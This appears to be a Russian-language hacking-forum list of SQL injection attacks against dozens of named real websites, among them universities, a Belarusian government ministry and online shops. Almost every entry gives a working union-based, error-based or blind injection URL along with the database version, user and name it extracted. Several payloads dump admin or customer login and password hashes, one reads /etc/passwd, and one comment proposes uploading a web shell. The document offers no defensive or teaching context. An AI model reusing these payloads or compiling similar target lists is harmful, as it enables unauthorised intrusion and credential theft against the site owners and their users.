Пример запроса: http://beta.weetwaar.com/f.php?ID=950+or+(select+count(*)+from+(select+1+un ion+select+2+union+select+3)x+group+by+concat(mid( concat_ws(0x0b,version(),user(),database(),@@versi on_compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - weetwaarco_u@localhost
database - weetwaarco_splace
os - pc-linux-gnu

============================================

Сайт: http://www.weetwaar.nl
ТИЦ: 0
PR: 2
Пример запроса: http://www.weetwaar.nl/module.php?ID=38296+or+(select+count(*)+from+(sele ct+1+union+select+2+union+select+3)x+group+by+conc at(mid(concat_ws(0x0b,version(),user(),0x0b),1,70) ,+floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch12-log
user - weetwaar@host073.procolix.com
database - weetwaar_nl
os - pc-linux-gnu

============================================

Сайт: http://www.centres.exeter.ac.uk
ТИЦ: 20
PR: 3
Пример запроса: http://centres.exeter.ac.uk/cls/programmes/module.php?id=-300+union+select+1,2,3,4,5,concat_ws(0x0b,version( ),user(),database(),@@version_compile_os),7,8,9,10 ,11,12,13,14,15,16,17,18,19,20--+
version - 5.0.45-log
user - sobeadm@snowwhite.ex.ac.uk
database - sobe
os - redhat-linux-gnu

============================================

Сайт: http://www.beoordeelmijnrecruiter.nl
ТИЦ: 0
PR: 3
Пример запроса: http://www.beoordeelmijnrecruiter.nl/module.php?ID=100455+or+(select+count(*)+from+(sel ect+1+union+select+2+union+select+3)x+group+by+con cat(mid(concat_ws(0x0b,version(),user(),database() ,@@version_compile_os,0x0b),1,63),+floor(rand(0)*2 )))--+
version - 5.0.32-Debian_7etch12-log
user - bmr@localhost
database - bmr
os - pc-linux-gnu

http://www.nordenhake.com/php/artistsExhibitions.php?id=-99'+union+select+1,2,3,4,5,6,7,8,version(),0,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,7 9,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95, 96,97/*

Database Version: 5.0.45-log
Database name: nordenhake_com
User name: norden_com@n3874@s73.loopia.se

----------------------------------------------------------------------------------------------------------------------------

http://www.artistsincanada.com/php/article.php?id=-339+union+select+1,2,version(),4,5,6,7,8,9,0,11,12 ,13--

Database Version: 5.0.90-community
Database name: artistsincanada_com
User name: artists@localhost

-----------------------------------------------------------------------------------------------------------------------------

http://www.detroitgospel.com/Php/newsdisplay.php?id=-151+union+select+1,version(),3,4,5,6,7,8,9,10--

Database Version: 5.0.83
Database name: detroi1_newsncalendar
User name: detroi1_select@216.157.150.192

-----------------------------------------------------------------------------------------------------------------------------

http://www.peterrake.com/php/display_model.php?id=-78+union+select+1,load_file(0x2f6574632f7061737377 64),3,4,5,6,7,8,9,0,11,12,13+from+mysql.user--

Database Version: 5.0.51a-24+lenny3
Database name: peterrake
User name: www@localhost

Сайт: http://www.lindespelers.nl
ТИЦ: 0
PR: 2
Пример запроса: http://www.lindespelers.nl/module.php?ID=214+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (mid(concat_ws(0x0b,version(),user(),database(),@@ version_compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - lindespele_u@localhost
database - lindespele_splace
os - pc-linux-gnu

============================================

Сайт: http://www.et2000.nl
ТИЦ: 0
PR: 2
Пример запроса: http://www.et2000.nl/module.php?ID=974+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (mid(concat_ws(0x0b,version(),user(),database(),@@ version_compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - et2000_splace@localhost
database - et2000_splace
os - pc-linux-gnu

============================================

Сайт: http://www.oranjenassau.net
ТИЦ: 0
PR: 3
Пример запроса: http://www.oranjenassau.net/module.php?aktie=view&ID=44447+or+(select+count(*)+from+(select+1+union+ select+2+union+select+3)x+group+by+concat(mid(conc at_ws(0x0b,version(),user(),database(),@@version_c ompile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - nassau_splace@localhost
database - nassau_splace
os - pc-linux-gnu

============================================

Сайт: http://www.splace.nl
ТИЦ: 0
PR: 4
Пример запроса: http://www.splace.nl/module.php?moduleID=1&ID=408+or+(select+count(*)+from+(select+1+union+se lect+2+union+select+3)x+group+by+concat(mid(concat _ws(0x0b,version(),user(),database(),@@version_com pile_os),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - soetendal_splace@localhost
database - soetendal_splace
os - pc-linux-gnu

============================================

Сайт: http://www.ifs.tu-braunschweig.de
ТИЦ: 0
PR: 3
Пример запроса: http://www.ifs.tu-braunschweig.de/module.php?id=49&action=download&fileid=12'+or+(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat(mid(co ncat_ws(0x0b,version(),user(),database(),@@version _compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.45
user - de@localhost
database - de
os - redhat-linux-gnu

============================================

Сайт: http://thailengo.com
ТИЦ: 0
PR: 0
Примеры запросов: http://thailengo.com/module.php?id=-1+union+select+1,2,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os)--+

http://thailengo.com/module.php?id=-1+union+select+1,2,group_concat(0x0b,user,0x3a,pas s)+from+users--+
version - 5.0.51a-24+lenny2+spu1
user - thai@localhost
database - thai
os - debian-linux-gnu

============================================

Сайт: http://www.iai-award.org
ТИЦ: 0
PR: 3
Пример запроса: http://www.iai-award.org/english/module.php?id=-58+union+select+1,concat_ws(0x0b,version(),user(), database(),@@version_compile_os),3,group_concat(0x 0b,table_name),5,6,7,8+from+information_schema.tab les--+
version - 5.0.90-community
user - mille44_iaiaward@localhost
database - mille44_iaiaward
os - pc-linux-gnu

http://www.chowk.com/site/articles/index.php?id=-4669+union+select+1,2,3,4,version(),6,7,8,9,0,11,1 2,13,14,15,16,17,18,19,20,21,22--

Database Version: 5.0.90-community
Database name: CHOWK
User name: chdbu@localhost

http://www.arcadi.fr/actualites/index.php?id=%27198 AND %True_Expression%

ШОПЫ


http://www.thedigitalcamerashop.co.uk/search.php?st=%27category|Storage%20Devices AND %True_Expression%

http://www.trampolining-online.co.uk/shop/products_list.php?cat=%2747&amp;s=%27* AND %True_Expression%

http://www.babybiker.co.uk/category.php?display-category=%274 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8--

http://www.teroberts.co.uk/index.php?UID=%272010051717454666.249.68.231 AND %True_Expression%

http://www.manuli.co.uk/index.php?c=%2776&amp;catParentId=%2740&amp;catName=%27Pad ded%20Envelopes/Bubble%20Mailers AND %True_Expression%

http://www.cypruspropertysales.co.uk/search.php?c=%273 AND %True_Expression%

http://www.manuli.co.uk/index.php?c=%2776&amp;catParentId=%2740&amp;catName=%27Pad ded%20Envelopes/Bubble%20Mailers AND %True_Expression%

http://www.tuscanfeeling.com/areas.php?id=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),4,5,6,7,8--+&s=6
user:tuscan@localhost
version:5.0.90-msl-usrs-sure2+lenny-log

http://www.discoverbajacalifornia.com/new.php?id=-211+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user(),@@version_compile_os),7,8--+
user:db9596_master@64.13.192.25
version:4.1.25-Debian_mt1-log

http://www.cybernation.com/quotationcenter/quoteshow.php?type=subject&id=-1390+union+select+concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),2--+
user:u70707283@cgihost
version:5.0.77-log

http://www.mathrubhumi.com/travel/news.php?id=-25853+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os),7,8,9, 10,11,12,13,14,15,16--+&cat=2&sub=6
user:mathrorg_enguser@75.125.120.228
version:5.0.90-community

http://www.edgeboston.com/index.php?ch=news&sc=&sc2=features&sc3=&id=-103259'+union+select+1,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os)--+
user:root@10.208.84.139
version:5.0.45

http://www.visitshrewsbury.com/newarticle.php?id=-831+union+select+1,2,concat_ws%(0x3a,version(),dat abase(),user(),@@version_compile_os),4,5,6,7,8,9,1 0,11,12,13,14,15,1617,18,19,20,21,22,23,24,25,26,2 7,28,29+from+mysql.user--+
user:root@94.236.19.219
version:5.0.45-log

http://www.visituganda.com/more.php?id=-3+union+select+1,concat_ws(0x3a,version(),database (),user(),@@version_compile_os),3,4,5,6,7,8,9,10,1 1--+&&tab=get_around
user:visit_travel@localhost
version:4.0.27-standard

http://www.moodiereport.com/category.php?id=-23+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),5,6,7,8,9,10, 11,12,13--+
user:dbread@localhost
version:5.0.22

http://www.deauville.org/en/page.php?id=-50+union+select+concat_ws(0x3a,version(),database( ),user(),@@version_compile_os),2,3,4--+
user:deauville@localhost
version:5.0.44-log

http://www.christianweek.org/features.php?id=55'+union+select+1,2,3,4,5,6,conca t_ws(0x3a,version(),database(),user(),@@version_co mpile_os),8,9,10,11,12,13--+
user:cweek@localhost
version:5.0.67-community

http://www.ethicaltraveler.org/news_story.php?id=-1154+union+select+1,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),3,4--+
user:imalawi_main@localhost
version:4.1.22-standard

http://www.bonnefoymichel.tourisme-vacances.eu/page-base.php?page=-27+union+select+@@version

Сайт: http://www.ifs.ing.tu-bs.de
ТИЦ: 0
PR: 5
Пример запроса: http://www.ifs.ing.tu-bs.de/module.php?id=49&action=download&fileid=18'+or+(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat(mid(co ncat_ws(0x0b,version(),user(),database(),@@version _compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.45
user - de@localhost
database - de
os - redhat-linux-gnu

============================================

Сайт: http://www.lead.ethz.ch
ТИЦ: 0
PR: 4
Пример запроса: http://www.lead.ethz.ch/module.php?id=-4+union+select+1,2,unhex(hex(concat_ws(0x0b,@@vers ion,user(),database(),@@version_compile_os))),4,5, 6,7,8,9,10,11,12,13--+
version - 4.1.18-max
user - lead@webcow20.ethz.ch
database - lead
os - Win32

http://www.deathdealers.eu/index.php?id=%272 UNION ALL SELECT %String_Col%--
Host IP: 91.200.35.2
Web Server: LiteSpeed
Powered-by: PHP/5.2.12
DB Server: MySQL unknown ver
Current DB: deathdea_normal


http://www.rugkliniek.eu/engels/index.php?ID=%273 UNION ALL SELECT %String_Col%,2,3,4,5,6,7--
Host IP: 85.234.225.22
Web Server: Apache/2.2
Powered-by: PHP/4.4.9
DB Server: MySQL
Current DB: rugklini


http://www.cordesurciel.eu/index.php?id=%270&amp;lg=%27en AND %True_Expression%
Host IP: 213.186.33.1
Web Server: Apache/2.2.X (OVH)
Powered-by: PHP/4.4.9
DB Server: MySQL
Current DB:


http://www.karaim.eu/index.php?id=%2724&amp;lang=%27 AND %True_Expression%
Host IP: 79.98.24.3
Web Server: Apache
DB Server: MySQL
Current DB:

http://www.see-125.eu/index.php?id=%27514 UNION ALL SELECT 1,%String_Col%,3,4,5,6--
Host IP: 83.169.72.7
Web Server: Apache
DB Server: MySQL
Current DB: see-125

http://blog.mediacorptv.net/blogshow.php?id=-76+union+select+1,user(),3,4+from+mysql.user--+
user:root@localhost
version:5.0.45-community-nt-log

http://teaspoon.ru/tea-rooms/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t_ws(0x3a,user(),version(),database(),@@version_co mpile_os),15,16,17,18,19,20,21,22,23,24,25--+

user() - z86369_9829@77.221.130.19
version() - 5.0.32-Debian_7etch11-log
database() - z86369_9829
os - pc-linux-gnu

ТИЦ - 160
Google PR - 4

http://www.aspic.edu.mx/ver_trofeos.php?id=-21+union+select+1,2,3,concat(user(),version(),data base(),@@version_compile_os)

http://www.selectsmart.com/FREE/select.php?client=-stuffy'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,version(),16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,6 1,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77, 78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94 ,95,96,97,98,99,100,101,102,103,104,105,106,107,10 8,109,110,111,112,113,114,115,116,117,118,119,120, 121,122,123,124,125,126,127,128,129,130,131,132,13 3,134,135,136,137,138,139,140,141,142,143,144,145, 146,147,148,149,150,151,152,153,154,155,156,157,15 8,159,160+--+

Version: 5.0.45-log
Database: ssmart_last
User: ssmart_4@localhost

Общественный сайт правительства северной африки, посвященный кризису в стране.

http://www.africancrisis.co.za/Home.php?Cat=-15+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20+--+

Version: 4.1.20-max-log
Database: JanAFC_DB
User: JanAFC_Pgm@72.41.255.242

http://www.tlaclive.org/productions.php?key=87678678+union+select+1,2,3,4, 5,version(),7,8,9--+

Version: 5.0.24
Database: tlac
User: tlac_07@localhost

http://www.robertchristgau.com/get_artist.php?name=Sleater-Kinney'+union+select+1,2,3,version()+--+

Version: 4.0.20-stand
Database: thdb
User: robertchrist

http://www.leeslekker.nl/index.php?page=bestel.php&id=-7175+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,use r(),version(),database(),@@version_compile_os),9,1 0,11,12,13,14,15,16,17,18,19

www.conceptsport.co.uk/events.php?pid=-1111 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9,10,11,12,13,14,15--

www.rockcard.co.uk/choose_size.php?cid=-95 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9,10,11,12,13,14--

www.viewfinderphotography.co.uk/product.php?cid=-1 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),v ersion()),5,6,7,8,9,10,11,12--

thefishy.co.uk/story.php?id=-8420104 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),v ersion()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27--

http://www.rukhnet.com/index.php?subid=-0000+union+select+concat(version(),user(),database ()),2,3,4,5,6,7+from+information_schema.tables--
Version:5.0.90-community
User: logrukhnetc_diradmi@localhost
Database: rukhnetc_directory

http://www.rhc.org.za/news.php?id=-1+union+select+1,2,3,4,version(),6,7,8/*

http://www.volunteerfalkirk.org.uk/news.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+( 'tblOrgAims'))--

http://www.metafix.co.uk/Scripts/news.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+ ('dtproperties')--

http://www.rockhill.ie/gallery/index.asp?ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+ char(78)%2Bchar(101) %2Bchar(119) %2Bchar(115) %2Bchar(108) %2Bchar(101) %2Bchar(116) %2Bchar(116) %2Bchar(101) %2B char(114) %2Bchar(80) %2Bchar(114) %2Bchar(101) %2Bchar(112) %2B char(97) %2Bchar(114) %2Bchar(101) %2Bchar(100) %2Bchar(69) %2B char(109) %2Bchar(97) %2Bchar(105) %2Bchar(108) %2Bchar(115))&page=7

http://www.bradfordchamber.co.uk/news.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+( char%2884%29%2Bchar%28105%29%2Bchar%2899%29%2Bchar %28107%29%2Bchar%2878%29%2Bchar%28101%29%2Bchar%28 119%29%2Bchar%28115%29%29%29--

http://www.retention.se/news.asp?id=1+SELECT+*+from+ adminuser +group+by+adminuser.userid+having+1=1#&pg=1

http://www.accomplishmanagement.co.uk/news.php?id=999999+union+select+1,concat_ws(0x3b,% 20user(),database(),version()),3,4,5,6,7/*

User: web148u1@localhost
Version: 5.0.32-Debian_7etch8-log
Database: web148db1

http://www.samsport.ie/news.php?id=999999+union+select+1,concat_ws(0x3b,% 20user(),database(),version()),3,4,5,6--

User: ssport_usr@localhost
Version: 5.0.51a-community
Database: samsport_db

http://www.klangwald.de/main/shop_details.php?id=99999+union+select+1,concat_ws (0x3a%20,user(),database(),version()),3,4/*

User: TE@localhost
Version: 4.0.17-nt
Database: klangwald

http://www.coffeytalk.com/product_details.php?id=-170+union+select+1,2,3,concat_ws(0x3b,%20user(),da tabase(),version()),5,6,7,8--

User: $coffey1@localhost
Version: 5.0.90-community
Database: coffey1_BlogNEW

http://reklama.vladinvest.ru/print_news.php?id=-5+union+select+1,2,concat_ws(0x3b,%20user(),databa se(),version()),4/*

User: ladinvestru@78.108.81.71
Version: 4.1.22
Database: vladinvestru2

http://lingvistschool.kiev.ua/news_ukr.php/news.php/forum/print/print_page_ukr.php?id=99999+union+select+1,concat_ ws(0x3b,%20user(),database(),version()),3,4,5,6--

User: 1.u_lingvistsc@localhost
Version: 5.0.44.3
Database: lingvistscho

http://www.euroforgings.com/shop2.php?id=-99999999+union+select+1,concat_ws(0x3a%20,user(),d atabase(),version()),3,4,5/*

User: euroforg_root@localhost
Version: 4.1.22-standard
Database: euroforg_alku2

http://www.ideja.edu.lv/index.php?content_id=-8+union+select+1,2,concat_ws(char(32),user(),versi on(),database(),@@version_compile_os),4,5,6,7,8,9, 10,11+from+information_schema.tables--

В преддверии игры сборной России по хоккею против Канады :)

http://www.thelamp.ca/film/index.php?id=27+union+select+1,2,concat_ws(0x3a,ve rsion(),da tabase(),user())%20,4,5,6,7,8,9--

Version : 5.1.39-log
Database : lamp
User : catmac@apache2-grog.galaga.dreamhost.com
OS : pc-linux-gnu

-----------------------------------------------------------

http://youthscienceforum.ca/view.php?id=17+and+1=2+union+select+1,2,3,aes_decr ypt(aes_encrypt(concat_ws(0x3a,version(),d atabase(),user()),0x71),0x71),5,6--

Version : 5.0.19-standard
Database : youthscienceforum
User : youthscience@205.207.185.71
OS : apple-darwin8.2.1 :)

http://www.igert.neu.edu/profile.php?pid=-16+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12


Database Version: 5.0.77-log
Database name: igert
User name: igert@localhost

http://www.rom.on.ca/programs/lectures/index.php?ref=showinfo&program_id=-5507+UNION+SELECT+1,GROUP_CONCAT(AES_DECRYPT(AES_E NCRYPT(COLUMN_NAME,1),1)),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TAB LE_NAME='romcart_users'%23

http://www.uk.playright.dk/firma.php?id=-14+union+select+1,concat(user,char(58),password),3 ,4,5,6,7,8,9,10,11,12+from+mysql.user

http://myaso-portal.ru/news_records_view.php?id=-3458+and+1=2+union+select+1,concat_ws(0x3a,user,pa ss),3,4,5,6,7,8,9,10+from+userlist+limit+1,1--

http://myaso-portal.ru/admin/
можно попробовать залить шелл

MS_access

http://www.ohiocampuscompact.org/page.cfm?ID=-181+union+select+1,2,3,4,5,6,7,8,9+from+pagetext1

PR-5

---------------------------------------------
http://www.jnht.com/heritage_site.php?id=-289+union+select+1,2,concat_ws(user(),version(),da tabase(),@@version_compile_os),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17--

PR-6

---------------------------------------------
http://www.sadarvuga.com/php/project.php?id=-59+union+select+0,group_concat(username,char(58),p assword)+from+users

PR-4
--------------------------------------------

http://www.gemidiriya.com/news_view.php?record_id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(char(32),user(),version(),database(),@@version_ compile_os,@@datadir),1),1),group_concat(table_nam e),5,6+from+information_schema.tables+where+table_ schema=CHAR(103,97,109,97,110,101,103,95,119,101,9 8,100,98)

PR-4
-------------------------------------------
http://www.buyabans.com/subcats.php?range_id=2&cat_id=-25+union+select+concat_ws(user(),version(),databas e(),@@version_compile_os)&subcat_id=41

PR-5

PR 6
ТИЦ 110
http://www.ecoculture.ru/ecolibrary/article.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10--
Version = 4.1.20
Current User = libsites@localhost
Current Database = ecoculture_db01

PR 6
ТИЦ 40
http://vmo.rgub.ru/policy/article.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12--

Version = 5.1.37-1ubuntu5.1
Current User = root@localhost
Current Database = vmo_db01

PR 5
ТИЦ 120
http://www.radiotec.ru/catalog.php?cat=jr14&art=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17--
Version = 5.0.90-community
Current User = radiotec_raduser@localhost
Current Database = radiotec_mainbase


PR 5
http://www.prsn.uprm.edu/English/Informe_Sismo/myinfoGeneral.php?ID=2010010522363609+and+1=0+unio n+select+0,1,2,3,4,5,6,7,8,9,10,11,12--
Version = 5.1.42
Powered by = PHP/5.3.1
Current User = webmysql@localhost
Current Database = dbase_tsunami

PR 8
http://www.polimi.it/index.php?id=3517&tx_wfqbe_pi1%5Bid%5D=6309+and+1=0+union+select+0,1 ,2,3,4,5,6--
Version = 5.0.85-log
Powered by = PHP/5.2.13
Current User = polimi@localhost
Current Database = polimi

Сайт: http://iksz.hu
ТИЦ: 0
PR: 4
Пример запроса: http://iksz.hu/rateit.php?id=999'+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(concat_ws(0x0b,version(),user(),database(),@@ver sion_compile_os),floor(rand(0)*2)))--+
version - 5.0.81-log
user - iksz@web.jail
database - iksznews
os - portbld-freebsd7.0

============================================

Сайт: http://jjc.yangtzeu.edu.cn
ТИЦ: 0
PR: 4
Примеры запросов: http://jjc.yangtzeu.edu.cn/list.php?typeid=-2+union+select+1,2,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),4,5,6,7--+

http://jjc.yangtzeu.edu.cn/list.php?typeid=-2+union+select+1,2,group_concat(uname,0x3a,pwd,0x3 a,email),4,5,6,7+from+jjc_admin--+
version - 5.0.45-community-nt-log
user - root@localhost
database - jjc
os - Win32

============================================

Сайт: http://www.stedenbandeindhoven.nl
ТИЦ: 0
PR: 4
Пример запроса: http://www.stedenbandeindhoven.nl/module.php?ID=68+or+(select+count(*)+from+(select+ 1+union+select+2+union+select+3)x+group+by+concat( concat_ws(0x0b,version(),user(),database(),@@versi on_compile_os),floor(rand(0)*2)))--+
version - 5.0.81-log
user - chinandega_u@localhost
database - chinandega_splace
os - pc-linux-gnu

============================================

Сайт: http://www.countryclub.at
ТИЦ: 10
PR: 3
Пример запроса: http://www.countryclub.at/v2/module.php?id=-42'+union+select+1,2,3,4,5,6,7,8,9,10,11,group_con cat(0x0b,username,0x3a,password),concat_ws(0x0b,ve rsion(),user(),database(),@@version_compile_os),14 ,15,16,17,18,19+from+access--+
version - 5.0.45
user - countryclub_at@localhost
database - countryclub_at_-_db1
os - redhat-linux-gnu

============================================

Сайт: http://www.imaculadanet.com.br
ТИЦ: 0
PR: 1
Пример запроса: http://www.imaculadanet.com.br/site/eventos.php?id=-7+union+select+1,2,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),group_concat(0x0 b,table_name),5,6+from+information_schema.tables--+
version - 5.0.51a-24+lenny3-log
user - site_www@localhost
database - www
os - debian-linux-gnu

============================================

Сайт: http://xcc.paragliding.pl
ТИЦ: 0
PR: 1
Примеры запросов: http://xcc.paragliding.pl/module.php?id=26&contest=PL&l=pl&date=20090606&competitorid=-100964+union+select+1,2,3,4,concat_ws(0x0b,version (),user(),database(),@@version_compile_os),6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33--+

http://xcc.paragliding.pl/module.php?id=26&contest=PL&l=pl&date=20090606&competitorid=-100964+union+select+1,2,3,4,group_concat(0x0b,colu mn_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33+from+inform ation_schema.columns+where+table_name=0x7068706262 5F7573657273--+
version - 5.0.26
user - web16@localhost
database - xcc_2009
os - suse-linux-gnu

============================================

Сайт: http://www.ondernemersparlement.nl
он же
http://www.onlineparlement.nl
он же
http://www.webocratics.com
ТИЦ: 0
PR: 0
Примеры запросов: http://www.ondernemersparlement.nl/module.php?ID=5180+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(concat_ws(0x0b,version(),user(),database(),@@ver sion_compile_os),floor(rand(0)*2)))--+

http://www.onlineparlement.nl/module.php?ID=999+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (concat_ws(0x0b,version(),user(),database(),@@vers ion_compile_os),floor(rand(0)*2)))--+

http://www.webocratics.com/module.php?ID=999+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (concat_ws(0x0b,version(),user(),database(),@@vers ion_compile_os),floor(rand(0)*2)))--+
version - 5.0.81-log
user - webocratic_u@localhost
database - webocratic_splace
os - pc-linux-gnu

============================================

Сайт: http://www.terranet-berlin.de
ТИЦ: 0
PR: 0
Пример запроса: http://www.terranet-berlin.de/dias/module.php?id=-44+union+select+1,2,3,4,concat_ws(0x0b,version(),u ser(),database(),@@version_compile_os),6,7,8,9--+
version - 4.0.27-max-log
user - dbo128602669@212.227.118.34
database - db128602669
os - pc-linux-gnu

============================================

Сайт: http://www.beoordeelmijndocent.nl
ТИЦ: 0
PR: 0
Пример запроса: http://www.beoordeelmijndocent.nl/module.php??moduleID=77&menuID=1913+or+(select+count(*)+from+(select+1+uni on+select+2+union+select+3)x+group+by+concat(conca t_ws(0x0b,version(),user(),database(),@@version_co mpile_os),floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch12-log
user - bmd@localhost
database - bmd
os - pc-linux-gnu

============================================

Сайт: http://data.weetmeer.nl
ТИЦ: 0
PR: ?
Пример запроса: http://data.weetmeer.nl/module.php?ID=68565+or+(select+count(*)+from+(sele ct+1+union+select+2+union+select+3)x+group+by+conc at(concat_ws(0x0b,version(),user(),database(),@@ve rsion_compile_os),floor(rand(0)*2)))--+
version - 5.0.81-log
user - weetmeer_beta@localhost
database - weetmeer_beta
os - pc-linux-gnu

============================================

Сайт: http://ifs.rz.tu-bs.de
ТИЦ: 0
PR: ?
Пример запроса: http://ifs.rz.tu-bs.de/module.php?id=49&action=download&fileid=-18'+or+(select+count(*)+from+(select+1+union+selec t+2+union+select+3)x+group+by+concat(concat_ws(0x0 b,version(),user(),database(),@@version_compile_os ),floor(rand(0)*2)))--+
version - 5.0.45
user - de@localhost
database - de
os - redhat-linux-gnu

Министерство связи и информатизации республики Беларусь
http://www.mpt.gov.by/new/modules/fotoar/index.php?sub&id=13+and+substring(version(),1,1)=4
Четвертая версия мускула, на union фильтр

Сайт: http://www.informatikcenter.de
ТИЦ: 10
PR: 3
Пример запроса: http://www.informatikcenter.de/redaktion/download.php?id=57'+or+(select+count(*)+from+(sele ct+1+union+select+2+union+select+3)x+group+by+conc at(concat_ws(0x0b,version(),user(),database(),@@ve rsion_compile_os),floor(rand(0)*2)))--+&type=file
version - 5.0.51a-24+lenny3
user - IN-06030001@localhost
database - IN-06030001
os - debian-linux

============================================

Сайт: http://www.oldrelics.com
ТИЦ: 0
PR: 3
Пример запроса: http://www.oldrelics.com/cms.php?id=-6+union+select+1,concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os),group_concat(0x0b, login_id,0x3a,password)+from+relics_admin--+
version - 5.0.91-log
user - custom_new@68.178.254.164
database - custom_new
os - unknown-linux-gnu

============================================

Сайт: http://www.pmaoakridge.com
ТИЦ: 0
PR: 3
Пример запроса: http://www.pmaoakridge.com/news_events_detail.php?news_events_id=-87+union+select+1,concat_ws(0x0b,version(),user(), database(),@@version_compile_os),3,4,5,6--+
version - 4.1.24-max-log
user - cayote55@208.109.14.112
database - cayote55
os - redhat-linux-gnu

============================================

Сайт: http://fuchsschafzucht-wechselberg.de
ТИЦ: 0
PR: 1
Пример запроса: http://fuchsschafzucht-wechselberg.de/cms.php?id=5+or+(select+count(*)+from+(select+1+un ion+select+2+union+select+3)x+group+by+concat(conc at_ws(0x0b,version(),user(),database(),@@version_c ompile_os),floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch11-log
user - fuchsschafzucht@srv45.one.com
database - fuchsschafzucht
os - pc-linux-gnu

============================================

Сайт: http://www.kgmotorsport.com
ТИЦ: 0
PR: 1
Примеры запросов: http://www.kgmotorsport.com/cms.php?id=-4'+union+select+1,2,3,group_concat(0x0b,login_id,0 x3a,password,0x3a,email),5,6,7,8,concat_ws(0x0b,ve rsion(),user(),database(),@@version_compile_os),10 ,11+from+sysadmin--+

http://www.kgmotorsport.com/cms.php?id=-4'+union+select+1,2,3,group_concat(0x0b,login,0x3a ,password,0x3a,email),5,6,7,8,now(),10,11+from+cus tomers--+
version - 5.0.89-community
user - web161-kgmotor@localhost
database - web161-kgmotor
os - pc-linux-gnu

============================================

Сайт: http://www.chisca.ca
ТИЦ: 0
PR: 0
Пример запроса: http://www.chisca.ca/cms.php?id=-18'+union+select+1,2,3,4,unhex(hex(concat_ws(0x0b, version(),user(),database(),@@version_compile_os)) ),6,7,8,9--+
version - 4.1.18-nt
user - chiscacarl_71463@216.10.251.120
database - chiscanew_71463
os - Win32

============================================

Сайт: http://www.homesurveysolutions.com
ТИЦ: 0
PR: 0
